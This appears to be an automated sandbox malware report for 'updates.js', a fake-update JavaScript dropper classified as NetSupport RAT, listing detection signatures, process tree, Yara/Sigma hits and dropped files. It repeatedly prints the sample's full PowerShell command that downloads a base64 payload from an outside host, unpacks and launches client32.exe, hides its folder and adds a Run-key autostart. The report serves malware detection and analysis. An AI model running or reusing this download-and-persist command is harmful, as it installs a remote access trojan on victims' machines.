Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updates.js

Overview

General Information

Sample name:updates.js
Analysis ID:1474469
MD5:2826502a26311bbe395d5ab565114330
SHA1:1764ea00a1262c07b13d0c4b059e88e57650dfc4
SHA256:65ab8ed555628693952b1fc385feca757b0a689981128d848f2c39a52e7da1e9
Tags:FAKEUPDATESjsNetSupport
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Snort IDS alert for network traffic
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
updates.jsINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x6dccdd:$b1: ::WriteAllBytes(
  • 0x6dcba4:$b2: ::FromBase64String(
  • 0x126b5:$s3: reverse
  • 0x1279c:$s3: reverse
  • 0x3a28d:$s3: reverse
  • 0x3a32a:$s3: reverse
  • 0x3b0f3:$s3: reverse
  • 0x3b41b:$s3: reverse
  • 0x3b594:$s3: reverse
  • 0x3b62f:$s3: reverse
  • 0x3ba5b:$s3: reverse
  • 0x3baaa:$s3: reverse
  • 0x3bac5:$s3: reverse
  • 0x3bbb3:$s3: reverse
  • 0x3c0bd:$s3: reverse
  • 0x3c0c7:$s3: reverse
  • 0xcdd68:$s3: reverse
  • 0xd164b:$s3: reverse
  • 0x1233f1:$s3: reverse
  • 0x12343c:$s3: reverse
  • 0x16ca53:$s3: reverse

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000007.00000002.1909048492.00000000111E2000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000008.00000000.1986528123.0000000000952000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 24 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      8.2.client32.exe.73a90000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        7.2.client32.exe.73a90000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          7.0.client32.exe.950000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            3.2.client32.exe.6f290000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              1.2.powershell.exe.170baed8fc8.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 23 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Base64 Encoded PowerShell Command Detected
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Sigma detected: Suspicious PowerShell Parameter Substring
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 7336, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HQWQTO
                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                Sigma detected: PowerShell Download Pattern
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Sigma detected: PowerShell Web Download
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Sigma detected: Suspicious PowerShell Download - PoshModule
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3a17fd44-b34d-41d8-a409-5a5030e19461 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH 